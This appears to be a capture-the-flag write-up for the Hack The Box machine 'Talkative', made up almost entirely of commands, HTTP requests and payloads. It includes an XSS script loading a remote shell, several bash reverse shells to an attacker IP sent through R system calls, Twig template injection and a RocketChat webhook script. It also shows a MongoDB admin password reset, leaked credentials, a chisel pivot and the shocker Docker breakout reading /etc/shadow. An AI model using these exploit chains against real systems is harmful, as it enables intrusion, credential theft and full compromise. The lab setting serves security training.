# We can see domain name

```
Nmap scan report for 10.10.11.155
Host is up (0.069s latency).

PORT     STATE    SERVICE VERSION
22/tcp   filtered ssh
80/tcp   open     http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Debian)
|_http-title: Did not follow redirect to http://talkative.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
```

# Directories enum

```
┌──(root㉿kali)-[~/htb/Box/Linux/Talkative]
└─# gobuster dir -u 'http://talkative.htb:8081/' -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,config,dat,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://talkative.htb:8081/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt,config,dat,bak
[+] Timeout:                 10s
===============================================================
2022/04/14 15:16:13 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/             (Status: 200) [Size: 512]
```

# Jamovi XSS

`<script src="http://10.10.14.110/shell.js"></script>`

# Rj - Editor to run R code inside jamovi

`system("id", intern=TRUE)`

`system("bash -c 'bash -i >& /dev/tcp/10.10.14.110/1234 0>&1'", intern=TRUE)`

# Get password from omv file

`cat bolt-administration.omv | base64 -w0`

`base64 -d base > bolt-administration.omv`

- `mkdir omv`
- `mv bolt-administration.omv omv`
- `cd omv`
- `unzip bolt-administration.omv`


`cat xdata.json`

```
matt@talkative.htb : jeO09ufhWD<s
janit@talkative.htb : bZ89h}V<S_DA
saul@talkative.htb : )SQWGm>9KHEA
```

# Bolt CMS page

`http://talkative.htb/bolt/login`


# STTI Bolt CMS

`http://talkative.htb/bolt/file-edit/themes?file=/base-2021/index.twig`

`{{['id']|filter('system')}}`

`http://talkative.htb/bolt/clearcache`

# Reverse shell

`http://talkative.htb/bolt/file-edit/themes?file=/base-2021/index.twig`

`{{['bash -c "bash -i >& /dev/tcp/10.10.14.110/4444 0>&1"']|filter('system')}}`

`http://talkative.htb/bolt/clearcache`

`curl http://talkative.htb/`

# Connect SSH saul

`ssh saul@10.10.11.155`

```
saul : jeO09ufhWD<s
```

# Enum process

`ps aux`

```
systemd+    1213  1.6  1.1 1355728 23084 ?       Ssl  16:26   0:15 mongod --smallfiles --replSet rs0 --oplogSize 128 --bind_ip_all
root        1456  0.0  0.0 1075368  736 ?        Sl   16:26   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 3000 -container-ip 172.17.0.3 -container-
```

# Enum services

`netstat -putona`

# Proxies SOCKS 

`wget 10.10.14.112/chisel`

- `./chisel server -p 5555 --reverse --socks5`
- `./chisel client 10.10.14.110:5555 R:socks`

# Access to MongoDB Reset password rocketchat

`proxychains mongo --quiet 172.17.0.2 2>/dev/null`

# MongoDB Reset password rocketchat

- `show dbs`
- `use meteor`
- `db.users.find()`

```
db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })
```

# Access RocketChat

`http://talkative.htb:3000/channel/general`

```
admin : 12345
```

# RocketChat RCE

```
POST /api/v1/integrations.create HTTP/1.1
Host: talkative.htb:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://talkative.htb:3000/admin/rooms
Content-Type: application/json
X-User-Id: ZLMid6a4h5YEosPQi
X-Auth-Token: baodYXcz-rK3iqfhKt0eaW0hwdt5uhNNSev5QcQXbCm
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: PHPSESSID=fnjn43737liq2cmmg0c7odf3hq; rc_uid=ZLMid6a4h5YEosPQi; rc_token=baodYXcz-rK3iqfhKt0eaW0hwdt5uhNNSev5QcQXbCm
Content-Length: 349

{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor('return process.mainModule.require')();const { exec } = require('child_process');exec('bash -c \"bash -i >& /dev/tcp/10.10.14.112/6666 0>&1\"');","type":"webhook-incoming"}
```

```
GET /hooks/cHMmBCKAaT6qdmK6w/J7EH2Z3H6WLp4ayoLDcHB3H2oGkfF35yHY6s6X7YZeYgZQY7 HTTP/1.1
Host: talkative.htb:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-User-Id: ZLMid6a4h5YEosPQi
X-Auth-Token: baodYXcz-rK3iqfhKt0eaW0hwdt5uhNNSev5QcQXbCm
Connection: close
Cookie: PHPSESSID=fnjn43737liq2cmmg0c7odf3hq; rc_uid=ZLMid6a4h5YEosPQi; rc_token=baodYXcz-rK3iqfhKt0eaW0hwdt5uhNNSev5QcQXbCm
```

# Capabilities Docker

`cat /proc/self/status`

```
CapPrm: 00000000a80425fd
CapEff: 00000000a80425fd
CapBnd: 00000000a80425fd
CapAmb: 0000000000000000
```

`capsh --decode=00000000a80425fd`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Talkative]
└─# capsh --decode=00000000a80425fd
0x00000000a80425fd=cap_chown,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
```

# cap_dac_read_search exploit (shocker)

`cc -Wall -std=c99 -O2 shocker.c -static`

# Download file nodejs

```js
const fs = require('fs');
const https = require('http');
  
const url = 'http://10.10.14.112:8081/a.out';
  
https.get(url,(res) => {
    const path = `/tmp/shocker`; 
    const filePath = fs.createWriteStream(path);
    res.pipe(filePath);
    filePath.on('finish',() => {
        filePath.close();
        console.log('Download Completed'); 
    })
})
```

# Run exploit

- `chmod +x shocker`
- `./shocker /etc/shadow &>shadow`

`cat shadow`

# Root flag

```
root@c150397ccd63:~# ./shocker /root/root.txt   
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]
[*] Resolving 'root/root.txt'
[*] Found lib32
[*] Found ..
[*] Found lost+found
[*] Found sbin
[*] Found bin
[*] Found boot
[*] Found dev
[*] Found run
[*] Found lib64
[*] Found .
[*] Found var
[*] Found home
[*] Found media
[*] Found proc
[*] Found etc
[*] Found lib
[*] Found libx32
[*] Found cdrom
[*] Found root
[+] Match: root ino=18
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'root.txt'
[*] Found ..
[*] Found .backup
[*] Found .config
[*] Found .cache
[*] Found .local
[*] Found .ssh
[*] Found .
[*] Found .profile
[*] Found .bashrc
[*] Found root.txt
[+] Match: root.txt ino=110097
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root.txt) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
5f008251622a6654723f870c27cb15f7
```

# References
https://github.com/theart42/cves/blob/master/CVE-2021-28079/CVE-2021-28079.md \
https://www.math.ucla.edu/~anderson/rw1001/library/base/html/system.html \
https://statisticsglobe.com/download-file-in-r-example \
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php \
https://book.hacktricks.xyz/pentesting/27017-27018-mongodb \
https://docs.rocket.chat/guides/administration/misc.-admin-guides/restoring-an-admin \
https://github.com/CsEnox/CVE-2021-22911/blob/main/new_exploit.py \
https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities \
https://raw.githubusercontent.com/gabrtv/shocker/master/shocker.c \
https://tbhaxor.com/container-breakout-part-2/